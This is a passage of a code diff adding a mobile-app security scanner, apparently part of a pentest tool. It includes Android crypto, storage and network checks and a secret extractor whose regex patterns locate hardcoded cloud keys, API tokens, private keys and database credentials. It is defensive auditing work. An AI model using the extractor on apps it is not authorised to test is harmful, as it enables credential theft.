+import { MobileScanTypes } from "../types"
+import { MobileScanStorage } from "../storage"
+import { JadxParser } from "../parsers/jadx"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "mobilescan.android.security" })
+
+/**
+ * Android security analyzer namespace.
+ */
+export namespace AndroidSecurityAnalyzer {
+  // ============================================
+  // Cryptography Analysis
+  // ============================================
+
+  /**
+   * Analyze cryptographic implementations.
+   */
+  export async function analyzeCrypto(
+    javaFiles: string[],
+    scanId: string,
+    appId: string
+  ): Promise<{
+    analysis: MobileScanTypes.CryptoAnalysis
+    findings: MobileScanTypes.MobileFinding[]
+  }> {
+    log.info("Analyzing cryptography", { fileCount: javaFiles.length })
+
+    const findings: MobileScanTypes.MobileFinding[] = []
+    const analysis: MobileScanTypes.CryptoAnalysis = {
+      weakAlgorithms: [],
+      hardcodedKeys: [],
+      insecureRandom: [],
+      ecbMode: [],
+      staticIV: [],
+      md5Usage: [],
+      sha1Usage: [],
+      properImplementations: [],
+    }
+
+    // Search for crypto patterns
+    const patterns = JadxParser.SECURITY_PATTERNS.filter((p) => p.owaspMobile === "M10")
+    const results = await JadxParser.searchPatterns(javaFiles, patterns)
+
+    for (const [name, matches] of results) {
+      const pattern = patterns.find((p) => p.name === name)
+      if (!pattern) continue
+
+      for (const match of matches) {
+        const location = JadxParser.toCodeLocation(match)
+
+        switch (name) {
+          case "weak_crypto_des":
+            analysis.weakAlgorithms.push("DES")
+            break
+          case "weak_crypto_ecb":
+            analysis.ecbMode.push(location)
+            break
+          case "weak_hash_md5":
+            analysis.md5Usage.push(location)
+            analysis.weakAlgorithms.push("MD5")
+            break
+          case "weak_hash_sha1":
+            analysis.sha1Usage.push(location)
+            analysis.weakAlgorithms.push("SHA-1")
+            break
+          case "insecure_random":
+            analysis.insecureRandom.push(location)
+            break
+          case "hardcoded_iv":
+            analysis.staticIV.push(location)
+            break
+        }
+
+        findings.push(createFinding(scanId, appId, {
+          title: pattern.description,
+          description: `${pattern.description} was detected at ${match.file}:${match.line}`,
+          severity: pattern.severity,
+          owaspMobile: pattern.owaspMobile,
+          category: "crypto",
+          codeLocation: location,
+          evidence: match.code,
+          recommendation: getCryptoRecommendation(name),
+        }))
+      }
+    }
+
+    // Deduplicate algorithms
+    analysis.weakAlgorithms = [...new Set(analysis.weakAlgorithms)]
+
+    return { analysis, findings }
+  }
+
+  function getCryptoRecommendation(pattern: string): string {
+    const recommendations: Record<string, string> = {
+      weak_crypto_des: "Replace DES with AES-256-GCM for encryption.",
+      weak_crypto_ecb: "Use CBC or GCM mode instead of ECB. ECB mode doesn't provide semantic security.",
+      weak_hash_md5: "Replace MD5 with SHA-256 or SHA-3 for hashing.",
+      weak_hash_sha1: "Replace SHA-1 with SHA-256 or SHA-3 for hashing.",
+      insecure_random: "Use SecureRandom instead of java.util.Random for cryptographic operations.",
+      hardcoded_iv: "Generate a random IV for each encryption operation. Store the IV alongside the ciphertext.",
+    }
+    return recommendations[pattern] || "Review and fix the cryptographic implementation."
+  }
+
+  // ============================================
+  // Storage Analysis
+  // ============================================
+
+  /**
+   * Analyze data storage security.
+   */
+  export async function analyzeStorage(
+    javaFiles: string[],
+    scanId: string,
+    appId: string
+  ): Promise<{
+    analysis: MobileScanTypes.StorageAnalysis
+    findings: MobileScanTypes.MobileFinding[]
+  }> {
+    log.info("Analyzing storage security", { fileCount: javaFiles.length })
+
+    const findings: MobileScanTypes.MobileFinding[] = []
+    const analysis: MobileScanTypes.StorageAnalysis = {
+      sharedPreferences: { found: false, sensitiveData: [] },
+      sqlite: { found: false, hardcodedQueries: [] },
+      externalStorage: { used: false, sensitiveData: [] },
+      logging: { sensitiveLogging: [] },
+      clipboard: { sensitiveData: [] },
+    }
+
+    // Search for storage patterns
+    const patterns = JadxParser.SECURITY_PATTERNS.filter((p) => p.owaspMobile === "M9")
+    const results = await JadxParser.searchPatterns(javaFiles, patterns)
+
+    for (const [name, matches] of results) {
+      const pattern = patterns.find((p) => p.name === name)
+      if (!pattern) continue
+
+      for (const match of matches) {
+        const location = JadxParser.toCodeLocation(match)
+
+        switch (name) {
+          case "world_readable":
+          case "world_writable":
+            if (analysis.sharedPreferences) {
+              analysis.sharedPreferences.found = true
+              if (name === "world_readable") analysis.sharedPreferences.worldReadable = true
+              if (name === "world_writable") analysis.sharedPreferences.worldWritable = true
+            }
+            break
+          case "external_storage":
+            if (analysis.externalStorage) {
+              analysis.externalStorage.used = true
+            }
+            break
+          case "sensitive_logging":
+            if (analysis.logging) {
+              analysis.logging.sensitiveLogging.push(location)
+            }
+            break
+        }
+
+        findings.push(createFinding(scanId, appId, {
+          title: pattern.description,
+          description: `${pattern.description} was detected at ${match.file}:${match.line}`,
+          severity: pattern.severity,
+          owaspMobile: pattern.owaspMobile,
+          category: "storage",
+          codeLocation: location,
+          evidence: match.code,
+          recommendation: getStorageRecommendation(name),
+        }))
+      }
+    }
+
+    // Check for SharedPreferences usage
+    const sharedPrefsMatches = await JadxParser.searchPattern(javaFiles, /getSharedPreferences|SharedPreferences/)
+    if (sharedPrefsMatches.length > 0 && analysis.sharedPreferences) {
+      analysis.sharedPreferences.found = true
+    }
+
+    // Check for SQLite usage
+    const sqliteMatches = await JadxParser.searchPattern(javaFiles, /SQLiteDatabase|openOrCreateDatabase|execSQL|rawQuery/)
+    if (sqliteMatches.length > 0 && analysis.sqlite) {
+      analysis.sqlite.found = true
+    }
+
+    return { analysis, findings }
+  }
+
+  function getStorageRecommendation(pattern: string): string {
+    const recommendations: Record<string, string> = {
+      world_readable: "Remove MODE_WORLD_READABLE. Use MODE_PRIVATE or EncryptedSharedPreferences.",
+      world_writable: "Remove MODE_WORLD_WRITABLE. Use MODE_PRIVATE or EncryptedSharedPreferences.",
+      external_storage: "Avoid storing sensitive data on external storage. If necessary, encrypt the data first.",
+      sensitive_logging: "Remove sensitive data from logs. Use BuildConfig.DEBUG to disable debug logs in production.",
+    }
+    return recommendations[pattern] || "Review and secure the data storage implementation."
+  }
+
+  // ============================================
+  // Network Security Analysis
+  // ============================================
+
+  /**
+   * Analyze network security.
+   */
+  export async function analyzeNetwork(
+    javaFiles: string[],
+    networkSecurityConfig: MobileScanTypes.NetworkSecurityConfig | null,
+    scanId: string,
+    appId: string
+  ): Promise<{
+    analysis: MobileScanTypes.NetworkSecurityAnalysis
+    findings: MobileScanTypes.MobileFinding[]
+  }> {
+    log.info("Analyzing network security", { fileCount: javaFiles.length })
+
+    const findings: MobileScanTypes.MobileFinding[] = []
+    const analysis: MobileScanTypes.NetworkSecurityAnalysis = {
+      cleartextAllowed: networkSecurityConfig?.cleartextTrafficPermitted ?? false,
+      insecureConnections: [],
+      customTrustManagers: [],
+    }
+
+    // Search for network security patterns
+    const patterns = JadxParser.SECURITY_PATTERNS.filter((p) => p.owaspMobile === "M5")
+    const results = await JadxParser.searchPatterns(javaFiles, patterns)
+
+    for (const [name, matches] of results) {
+      const pattern = patterns.find((p) => p.name === name)
+      if (!pattern) continue
+
+      for (const match of matches) {
+        const location = JadxParser.toCodeLocation(match)
+
+        if (name === "ssl_all_trust" || name === "hostname_verifier_allow_all") {
+          analysis.customTrustManagers.push(location)
+        }
+
+        if (name === "cleartext_http") {
+          analysis.insecureConnections.push(match.code)
+        }
+
+        findings.push(createFinding(scanId, appId, {
+          title: pattern.description,
+          description: `${pattern.description} was detected at ${match.file}:${match.line}. This severely weakens TLS security.`,
+          severity: pattern.severity,
+          owaspMobile: pattern.owaspMobile,
+          category: "network",
+          codeLocation: location,
+          evidence: match.code,
+          recommendation: getNetworkRecommendation(name),
+        }))
+      }
+    }
+
+    // Analyze Network Security Config
+    if (networkSecurityConfig) {
+      if (networkSecurityConfig.debugOverrides) {
+        findings.push(createFinding(scanId, appId, {
+          title: "Debug Overrides in Network Security Config",
+          description:
+            "The network security configuration has debug-overrides enabled. Ensure this is removed in production builds.",
+          severity: "medium",
+          owaspMobile: "M5",
+          category: "network",
+          recommendation: "Remove debug-overrides from the production network security configuration.",
+        }))
+      }
+
+      if (networkSecurityConfig.cleartextTrafficPermitted) {
+        findings.push(createFinding(scanId, appId, {
+          title: "Cleartext Traffic Permitted in Network Security Config",
+          description: "The network security configuration allows cleartext (HTTP) traffic globally.",
+          severity: "high",
+          owaspMobile: "M5",
+          category: "network",
+          recommendation:
+            "Set cleartextTrafficPermitted=false in base-config. Use domain-config for specific domains that require HTTP.",
+        }))
+      }
+
+      // Check pinning
+      if (networkSecurityConfig.pinnedDomains.length > 0) {
+        analysis.sslPinning = {
+          detected: true,
+          implementation: "AndroidNativeConfig",
+          pinnedDomains: networkSecurityConfig.pinnedDomains.map((d) => d.domain),
+          locations: [{ file: "network_security_config.xml" }],
+          bypassable: true,
+        }
+      }
+    }
+
+    // Check WebView security
+    const webviewPatterns = JadxParser.SECURITY_PATTERNS.filter((p) => p.name.startsWith("webview"))
+    const webviewResults = await JadxParser.searchPatterns(javaFiles, webviewPatterns)
+
+    for (const [name, matches] of webviewResults) {
+      const pattern = webviewPatterns.find((p) => p.name === name)
+      if (!pattern) continue
+
+      for (const match of matches) {
+        findings.push(createFinding(scanId, appId, {
+          title: pattern.description,
+          description: `${pattern.description} was detected at ${match.file}:${match.line}`,
+          severity: pattern.severity,
+          owaspMobile: pattern.owaspMobile,
+          category: "webview",
+          codeLocation: JadxParser.toCodeLocation(match),
+          evidence: match.code,
+          recommendation: getWebViewRecommendation(name),
+        }))
+      }
+    }
+
+    // Set WebView analysis in result
+    if (webviewResults.size > 0) {
+      analysis.webViewSettings = {
+        javascriptEnabled: webviewResults.has("webview_javascript"),
+        allowFileAccess: webviewResults.has("webview_file_access"),
+      }
+    }
+
+    return { analysis, findings }
+  }
+
+  function getNetworkRecommendation(pattern: string): string {
+    const recommendations: Record<string, string> = {
+      ssl_all_trust:
+        "Remove the trust-all implementation. Use proper certificate validation and consider implementing certificate pinning.",
+      hostname_verifier_allow_all:
+        "Remove ALLOW_ALL_HOSTNAME_VERIFIER. Use the default hostname verifier or implement proper hostname validation.",
+      cleartext_http: "Use HTTPS for all network communications. Configure a Network Security Configuration to block HTTP.",
+    }
+    return recommendations[pattern] || "Review and secure the network implementation."
+  }
+
+  function getWebViewRecommendation(pattern: string): string {
+    const recommendations: Record<string, string> = {
+      webview_javascript:
+        "Only enable JavaScript if necessary. Validate the source of loaded content and implement proper Content Security Policy.",
+      webview_file_access:
+        "Disable file access in WebView unless absolutely necessary. If needed, restrict to specific paths.",
+      webview_universal_access:
+        "Remove setAllowUniversalAccessFromFileURLs(true). This creates a significant security risk.",
+      addjavascriptinterface:
+        "Be extremely careful with addJavascriptInterface. Only expose minimal functionality and validate all inputs.",
+    }
+    return recommendations[pattern] || "Review and secure the WebView configuration."
+  }
+
+  // ============================================
+  // Helper Functions
+  // ============================================
+
+  /**
+   * Create finding helper.
+   */
+  function createFinding(
+    scanId: string,
+    appId: string,
+    data: {
+      title: string
+      description: string
+      severity: MobileScanTypes.Severity
+      owaspMobile: MobileScanTypes.OwaspMobile
+      category: string
+      component?: string
+      codeLocation?: MobileScanTypes.CodeLocation
+      evidence?: string
+      recommendation?: string
+    }
+  ): MobileScanTypes.MobileFinding {
+    return {
+      id: MobileScanStorage.createFindingId(),
+      scanId,
+      appId,
+      platform: "android",
+      title: data.title,
+      description: data.description,
+      severity: data.severity,
+      owaspMobile: data.owaspMobile,
+      category: data.category,
+      component: data.component,
+      codeLocation: data.codeLocation,
+      evidence: data.evidence,
+      recommendation: data.recommendation || "Review and fix the security issue.",
+      references: [],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/common/api-keys.ts b/packages/opencode/src/pentest/mobilescan/common/api-keys.ts
new file mode 100644
index 00000000000..ff4a1059667
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/common/api-keys.ts
@@ -0,0 +1,546 @@
+/**
+ * @fileoverview API Key and Secret Extraction
+ *
+ * Extracts hardcoded API keys, secrets, and credentials from mobile applications.
+ *
+ * @module pentest/mobilescan/common/api-keys
+ */
+
+import { MobileScanTypes } from "../types"
+import { MobileScanStorage } from "../storage"
+import { Log } from "../../../util/log"
+import { promises as fs } from "fs"
+
+const log = Log.create({ service: "mobilescan.common.api-keys" })
+
+/**
+ * API Key extraction namespace.
+ */
+export namespace ApiKeyExtractor {
+  /**
+   * Secret pattern definition.
+   */
+  export interface SecretPattern {
+    name: string
+    type: MobileScanTypes.SecretType
+    pattern: RegExp
+    validation?: (value: string) => boolean
+    confidence: "high" | "medium" | "low"
+    description: string
+  }
+
+  /**
+   * Pre-defined secret patterns.
+   */
+  export const SECRET_PATTERNS: SecretPattern[] = [
+    // AWS
+    {
+      name: "AWS Access Key ID",
+      type: "aws_key",
+      pattern: /\b(AKIA[0-9A-Z]{16})\b/g,
+      confidence: "high",
+      description: "AWS Access Key ID",
+    },
+    {
+      name: "AWS Secret Access Key",
+      type: "aws_key",
+      pattern: /(?:aws_secret_access_key|AWS_SECRET_ACCESS_KEY|secret_key)\s*[=:]\s*["']?([A-Za-z0-9/+=]{40})["']?/g,
+      confidence: "high",
+      description: "AWS Secret Access Key",
+    },
+
+    // Google/Firebase
+    {
+      name: "Google API Key",
+      type: "gcp_key",
+      pattern: /\b(AIza[0-9A-Za-z_-]{35})\b/g,
+      confidence: "high",
+      description: "Google/Firebase API Key",
+    },
+    {
+      name: "Google OAuth Client ID",
+      type: "gcp_key",
+      pattern: /\b([0-9]+-[a-z0-9]+\.apps\.googleusercontent\.com)\b/g,
+      confidence: "high",
+      description: "Google OAuth Client ID",
+    },
+    {
+      name: "Firebase Database URL",
+      type: "firebase_key",
+      pattern: /\b(https:\/\/[a-z0-9-]+\.firebaseio\.com)\b/g,
+      confidence: "medium",
+      description: "Firebase Realtime Database URL",
+    },
+
+    // Azure
+    {
+      name: "Azure Storage Connection String",
+      type: "azure_key",
+      pattern: /DefaultEndpointsProtocol=https;AccountName=([^;]+);AccountKey=([^;]+)/g,
+      confidence: "high",
+      description: "Azure Storage Connection String",
+    },
+    {
+      name: "Azure AD Client Secret",
+      type: "azure_key",
+      pattern: /(?:client_secret|clientSecret)\s*[=:]\s*["']?([a-zA-Z0-9~_.-]{34,})["']?/g,
+      confidence: "medium",
+      description: "Azure AD Client Secret",
+    },
+
+    // Private Keys
+    {
+      name: "RSA Private Key",
+      type: "private_key",
+      pattern: /(-----BEGIN RSA PRIVATE KEY-----[\s\S]*?-----END RSA PRIVATE KEY-----)/g,
+      confidence: "high",
+      description: "RSA Private Key",
+    },
+    {
+      name: "EC Private Key",
+      type: "private_key",
+      pattern: /(-----BEGIN EC PRIVATE KEY-----[\s\S]*?-----END EC PRIVATE KEY-----)/g,
+      confidence: "high",
+      description: "EC Private Key",
+    },
+    {
+      name: "Generic Private Key",
+      type: "private_key",
+      pattern: /(-----BEGIN PRIVATE KEY-----[\s\S]*?-----END PRIVATE KEY-----)/g,
+      confidence: "high",
+      description: "Private Key",
+    },
+    {
+      name: "OpenSSH Private Key",
+      type: "private_key",
+      pattern: /(-----BEGIN OPENSSH PRIVATE KEY-----[\s\S]*?-----END OPENSSH PRIVATE KEY-----)/g,
+      confidence: "high",
+      description: "OpenSSH Private Key",
+    },
+
+    // JWT and OAuth
+    {
+      name: "JWT Token",
+      type: "jwt_secret",
+      pattern: /\b(eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*)\b/g,
+      validation: (value) => {
+        try {
+          const parts = value.split(".")
+          if (parts.length !== 3) return false
+          JSON.parse(Buffer.from(parts[0], "base64url").toString())
+          JSON.parse(Buffer.from(parts[1], "base64url").toString())
+          return true
+        } catch {
+          return false
+        }
+      },
+      confidence: "high",
+      description: "JWT Token",
+    },
+    {
+      name: "OAuth Secret",
+      type: "oauth_secret",
+      pattern: /(?:client_secret|oauth_secret|api_secret)\s*[=:]\s*["']?([a-zA-Z0-9_-]{24,})["']?/gi,
+      confidence: "medium",
+      description: "OAuth Client Secret",
+    },
+
+    // Database
+    {
+      name: "MongoDB Connection String",
+      type: "database_credential",
+      pattern: /mongodb(?:\+srv)?:\/\/([^:]+):([^@]+)@[^/]+/g,
+      confidence: "high",
+      description: "MongoDB Connection String with Credentials",
+    },
+    {
+      name: "PostgreSQL Connection String",
+      type: "database_credential",
+      pattern: /postgres(?:ql)?:\/\/([^:]+):([^@]+)@[^/]+/g,
+      confidence: "high",
+      description: "PostgreSQL Connection String with Credentials",
+    },
+    {
+      name: "MySQL Connection String",
+      type: "database_credential",
+      pattern: /mysql:\/\/([^:]+):([^@]+)@[^/]+/g,
+      confidence: "high",
+      description: "MySQL Connection String with Credentials",
+    },
+
+    // Common API Keys
+    {
+      name: "Stripe API Key",
+      type: "api_key",
+      pattern: /\b(sk_(?:live|test)_[a-zA-Z0-9]{24,})\b/g,
+      confidence: "high",
+      description: "Stripe Secret API Key",
+    },
+    {
+      name: "Stripe Publishable Key",
+      type: "api_key",
+      pattern: /\b(pk_(?:live|test)_[a-zA-Z0-9]{24,})\b/g,
+      confidence: "medium",
+      description: "Stripe Publishable Key",
+    },
+    {
+      name: "Twilio API Key",
+      type: "api_key",
+      pattern: /\b(SK[a-f0-9]{32})\b/g,
+      confidence: "high",
+      description: "Twilio API Key",
+    },
+    {
+      name: "SendGrid API Key",
+      type: "api_key",
+      pattern: /\b(SG\.[a-zA-Z0-9_-]{22}\.[a-zA-Z0-9_-]{43})\b/g,
+      confidence: "high",
+      description: "SendGrid API Key",
+    },
+    {
+      name: "Mailgun API Key",
+      type: "api_key",
+      pattern: /\b(key-[a-z0-9]{32})\b/g,
+      confidence: "high",
+      description: "Mailgun API Key",
+    },
+    {
+      name: "Slack Token",
+      type: "api_key",
+      pattern: /\b(xox[baprs]-[0-9A-Za-z-]+)\b/g,
+      confidence: "high",
+      description: "Slack Token",
+    },
+    {
+      name: "GitHub Token",
+      type: "api_key",
+      pattern: /\b(gh[pousr]_[A-Za-z0-9_]{36,})\b/g,
+      confidence: "high",
+      description: "GitHub Personal Access Token",
+    },
+    {
+      name: "Heroku API Key",
+      type: "api_key",
+      pattern: /\b([a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})\b/g,
+      validation: (value) => value.includes("-"),
+      confidence: "low",
+      description: "Heroku API Key (UUID format)",
+    },
+
+    // Generic Patterns
+    {
+      name: "Generic API Key",
+      type: "api_key",
+      pattern: /(?:api[_-]?key|apikey)\s*[=:]\s*["']?([a-zA-Z0-9_-]{20,})["']?/gi,
+      confidence: "medium",
+      description: "Generic API Key",
+    },
+    {
+      name: "Generic Secret",
+      type: "generic_secret",
+      pattern: /(?:secret|password|passwd|pwd|token)\s*[=:]\s*["']([^"']{8,})["']/gi,
+      confidence: "medium",
+      description: "Generic Secret/Password",
+    },
+    {
+      name: "Encryption Key",
+      type: "encryption_key",
+      pattern: /(?:encryption[_-]?key|aes[_-]?key|secret[_-]?key)\s*[=:]\s*["']?([a-zA-Z0-9+/=]{16,})["']?/gi,
+      confidence: "medium",
+      description: "Encryption Key",
+    },
+  ]
+
+  /**
+   * Extract secrets from files.
+   */
+  export async function extractFromFiles(files: string[]): Promise<MobileScanTypes.ExtractedSecret[]> {
+    log.info("Extracting secrets from files", { fileCount: files.length })
+
+    const secrets: MobileScanTypes.ExtractedSecret[] = []
+    const seenValues = new Set<string>()
+
+    for (const file of files) {
+      try {
+        const content = await fs.readFile(file, "utf-8")
+        const fileSecrets = extractFromContent(content, file)
+
+        for (const secret of fileSecrets) {
+          // Deduplicate
+          if (!seenValues.has(secret.value)) {
+            seenValues.add(secret.value)
+            secrets.push(secret)
+          }
+        }
+      } catch {
+        // Skip files that can't be read
+      }
+    }
+
+    log.info("Secrets extraction complete", { secretCount: secrets.length })
+    return secrets
+  }
+
+  /**
+   * Extract secrets from content.
+   */
+  export function extractFromContent(
+    content: string,
+    filePath: string
+  ): MobileScanTypes.ExtractedSecret[] {
+    const secrets: MobileScanTypes.ExtractedSecret[] = []
+    const lines = content.split("\n")
+
+    for (const pattern of SECRET_PATTERNS) {
+      // Reset regex state
+      pattern.pattern.lastIndex = 0
+
+      let match
+      while ((match = pattern.pattern.exec(content)) !== null) {
+        const value = match[1] || match[0]
+
+        // Skip if validation fails
+        if (pattern.validation && !pattern.validation(value)) {
+          continue
+        }
+
+        // Skip common false positives
+        if (isLikelyFalsePositive(value, pattern)) {
+          continue
+        }
+
+        // Find line number
+        const beforeMatch = content.substring(0, match.index)
+        const lineNumber = (beforeMatch.match(/\n/g) || []).length + 1
+
+        // Get context
+        const startLine = Math.max(0, lineNumber - 2)
+        const endLine = Math.min(lines.length - 1, lineNumber + 1)
+        const context = lines.slice(startLine, endLine + 1).join("\n")
+
+        secrets.push({
+          id: MobileScanStorage.createSecretId(),
+          type: pattern.type,
+          value,
+          maskedValue: maskValue(value),
+          location: {
+            file: filePath,
+            line: lineNumber,
+            snippet: lines[lineNumber - 1]?.trim(),
+          },
+          confidence: pattern.confidence,
+          entropy: calculateEntropy(value),
+          pattern: pattern.name,
+          context,
+        })
+      }
+    }
+
+    return secrets
+  }
+
+  /**
+   * Extract secrets from strings array.
+   */
+  export function extractFromStrings(strings: string[]): MobileScanTypes.ExtractedSecret[] {
+    const secrets: MobileScanTypes.ExtractedSecret[] = []
+    const seenValues = new Set<string>()
+
+    for (const str of strings) {
+      for (const pattern of SECRET_PATTERNS) {
+        pattern.pattern.lastIndex = 0
+
+        let match
+        while ((match = pattern.pattern.exec(str)) !== null) {
+          const value = match[1] || match[0]
+
+          // Skip if validation fails
+          if (pattern.validation && !pattern.validation(value)) {
+            continue
+          }
+
+          // Skip common false positives
+          if (isLikelyFalsePositive(value, pattern)) {
+            continue
+          }
+
+          // Deduplicate
+          if (seenValues.has(value)) {
+            continue
+          }
+          seenValues.add(value)
+
+          secrets.push({
+            id: MobileScanStorage.createSecretId(),
+            type: pattern.type,
+            value,
+            maskedValue: maskValue(value),
+            location: {
+              file: "strings",
+            },
+            confidence: pattern.confidence,
+            entropy: calculateEntropy(value),
+            pattern: pattern.name,
+          })
+        }
+      }
+
+      // Also check for high-entropy strings
+      if (str.length >= 20 && str.length <= 200) {
+        const entropy = calculateEntropy(str)
+        if (entropy > 4.5 && /^[A-Za-z0-9+/=_-]+$/.test(str)) {
+          if (!seenValues.has(str)) {
+            seenValues.add(str)
+            secrets.push({
+              id: MobileScanStorage.createSecretId(),
+              type: "generic_secret",
+              value: str,
+              maskedValue: maskValue(str),
+              location: { file: "strings" },
+              confidence: "low",
+              entropy,
+              pattern: "High entropy string",
+            })
+          }
+        }
+      }
+    }
+
+    return secrets
+  }
+
+  /**
+   * Check if value is likely a false positive.
+   */
+  function isLikelyFalsePositive(value: string, pattern: SecretPattern): boolean {
+    // Skip placeholder/example values
+    const placeholders = [
+      "YOUR_API_KEY",
+      "YOUR_SECRET",
+      "XXXXXXXX",
+      "********",
+      "example",
+      "placeholder",
+      "test",
+      "sample",
+      "demo",
+      "changeme",
+      "secret",
+      "password",
+      "api_key",
+      "undefined",
+      "null",
+    ]
+
+    const valueLower = value.toLowerCase()
+    for (const placeholder of placeholders) {
+      if (valueLower === placeholder || valueLower.includes(placeholder.toLowerCase())) {
+        return true
+      }
+    }
+
+    // Skip values that are too uniform
+    if (/^(.)\1+$/.test(value)) {
+      return true
+    }
+
+    // Skip values that are mostly the same character
+    const charCounts: Record<string, number> = {}
+    for (const char of value) {
+      charCounts[char] = (charCounts[char] || 0) + 1
+    }
+    const maxCount = Math.max(...Object.values(charCounts))
+    if (maxCount / value.length > 0.7) {
+      return true
+    }
+
+    // Skip common build/version strings
+    if (/^\d+\.\d+\.\d+/.test(value) || /^v?\d+\.\d+/.test(value)) {
+      return true
+    }
+
+    // Skip UUIDs for non-UUID patterns
+    if (pattern.type !== "api_key" && /^[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}$/i.test(value)) {
+      return true
+    }
+
+    return false
+  }
+
+  /**
+   * Mask secret value for display.
+   */
+  function maskValue(value: string): string {
+    if (value.length <= 8) {
+      return "*".repeat(value.length)
+    }
+    const visibleChars = Math.min(4, Math.floor(value.length / 4))
+    return value.substring(0, visibleChars) + "*".repeat(value.length - visibleChars * 2) + value.substring(value.length - visibleChars)
+  }
+
+  /**
+   * Calculate Shannon entropy of a string.
+   */
+  function calculateEntropy(str: string): number {
+    const freq: Record<string, number> = {}
+    for (const char of str) {
+      freq[char] = (freq[char] || 0) + 1
+    }
+
+    let entropy = 0
+    const len = str.length
+    for (const count of Object.values(freq)) {
+      const p = count / len
+      entropy -= p * Math.log2(p)
+    }
+
+    return entropy
+  }
+
+  /**
+   * Create finding for hardcoded secret.
+   */
+  export function createSecretFinding(
+    scanId: string,
+    appId: string,
+    platform: MobileScanTypes.Platform,
+    secret: MobileScanTypes.ExtractedSecret
+  ): Omit<MobileScanTypes.MobileFinding, "id"> {
+    const typeDescriptions: Record<MobileScanTypes.SecretType, string> = {
+      api_key: "API Key",
+      aws_key: "AWS Credentials",
+      gcp_key: "Google Cloud Credentials",
+      azure_key: "Azure Credentials",
+      firebase_key: "Firebase Credentials",
+      google_maps_key: "Google Maps API Key",
+      private_key: "Private Key",
+      jwt_secret: "JWT Token",
+      oauth_secret: "OAuth Secret",
+      database_credential: "Database Credentials",
+      encryption_key: "Encryption Key",
+      generic_secret: "Hardcoded Secret",
+    }
+
+    return {
+      scanId,
+      appId,
+      platform,
+      title: `Hardcoded ${typeDescriptions[secret.type] || "Secret"} Detected`,
+      description: `A hardcoded ${typeDescriptions[secret.type]?.toLowerCase() || "secret"} was found in the application code. Hardcoded credentials can be extracted by attackers through reverse engineering.`,
+      severity: secret.confidence === "high" ? "high" : secret.confidence === "medium" ? "medium" : "low",
+      owaspMobile: "M1",
+      category: "credentials",
+      codeLocation: secret.location,
+      evidence: `Pattern: ${secret.pattern}, Value (masked): ${secret.maskedValue}`,
+      recommendation:
+        "Remove hardcoded secrets from the application code. Use secure storage mechanisms (Android Keystore, iOS Keychain) or retrieve secrets from a secure backend service at runtime.",
+      references: [
+        "https://owasp.org/www-project-mobile-security-testing-guide/",
+        "https://cwe.mitre.org/data/definitions/798.html",
+      ],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/common/index.ts b/packages/opencode/src/pentest/mobilescan/common/index.ts
new file mode 100644
index 00000000000..0762b3c7b95
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/common/index.ts
@@ -0,0 +1,13 @@
+/**
+ * @fileoverview Common Mobile Analysis Modules
+ *
+ * Cross-platform analysis modules for mobile application security testing.
+ *
+ * @module pentest/mobilescan/common
+ */
+
+export { SSLPinningDetector } from "./ssl-pinning"
+export { RootDetector } from "./root-detection"
+export { ObfuscationAnalyzer } from "./obfuscation"
+export { ApiKeyExtractor } from "./api-keys"
+export { UrlExtractor } from "./urls"
diff --git a/packages/opencode/src/pentest/mobilescan/common/obfuscation.ts b/packages/opencode/src/pentest/mobilescan/common/obfuscation.ts
new file mode 100644
index 00000000000..277b5d06226
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/common/obfuscation.ts
@@ -0,0 +1,473 @@
+/**
+ * @fileoverview Code Obfuscation Analysis
+ *
+ * Analyzes mobile application code for obfuscation strength and techniques.
+ *
+ * @module pentest/mobilescan/common/obfuscation
+ */
+
+import { MobileScanTypes } from "../types"
+import { Log } from "../../../util/log"
+import { promises as fs } from "fs"
+import path from "path"
+
+const log = Log.create({ service: "mobilescan.common.obfuscation" })
+
+/**
+ * Obfuscation analysis namespace.
+ */
+export namespace ObfuscationAnalyzer {
+  /**
+   * Known obfuscation tools and their indicators.
+   */
+  export const OBFUSCATION_TOOLS: Array<{
+    name: string
+    platform: "android" | "ios" | "both"
+    indicators: RegExp[]
+    strength: "strong" | "medium" | "weak"
+  }> = [
+    // Android
+    {
+      name: "ProGuard",
+      platform: "android",
+      indicators: [/^[a-z]$/, /^[a-z]{1,2}$/, /proguard/i],
+      strength: "weak",
+    },
+    {
+      name: "R8",
+      platform: "android",
+      indicators: [/^[a-z]$/, /^[a-z]{1,2}$/, /r8/i],
+      strength: "weak",
+    },
+    {
+      name: "DexGuard",
+      platform: "android",
+      indicators: [/dexguard/i, /guardsquare/i, /encrypted_strings/i],
+      strength: "strong",
+    },
+    {
+      name: "Allatori",
+      platform: "android",
+      indicators: [/allatori/i],
+      strength: "medium",
+    },
+    {
+      name: "DashO",
+      platform: "android",
+      indicators: [/dasho/i, /preemptive/i],
+      strength: "medium",
+    },
+    {
+      name: "Arxan",
+      platform: "both",
+      indicators: [/arxan/i, /digital\.ai/i],
+      strength: "strong",
+    },
+    {
+      name: "iXGuard",
+      platform: "ios",
+      indicators: [/ixguard/i, /guardsquare/i],
+      strength: "strong",
+    },
+    {
+      name: "Bangcle",
+      platform: "android",
+      indicators: [/bangcle/i, /secneo/i],
+      strength: "strong",
+    },
+    {
+      name: "Qihoo 360",
+      platform: "android",
+      indicators: [/libjiagu/i, /qihoo/i, /360/],
+      strength: "strong",
+    },
+    {
+      name: "Tencent Legu",
+      platform: "android",
+      indicators: [/tencent/i, /legu/i, /libshell/i],
+      strength: "strong",
+    },
+  ]
+
+  /**
+   * Analyze obfuscation in Android APK.
+   */
+  export async function analyzeAndroid(
+    smaliDirs: string[],
+    javaFiles?: string[]
+  ): Promise<MobileScanTypes.ObfuscationResult> {
+    log.info("Analyzing Android obfuscation", { smaliDirs: smaliDirs.length })
+
+    const analysis: ObfuscationAnalysis = {
+      classRenaming: false,
+      methodRenaming: false,
+      stringEncryption: false,
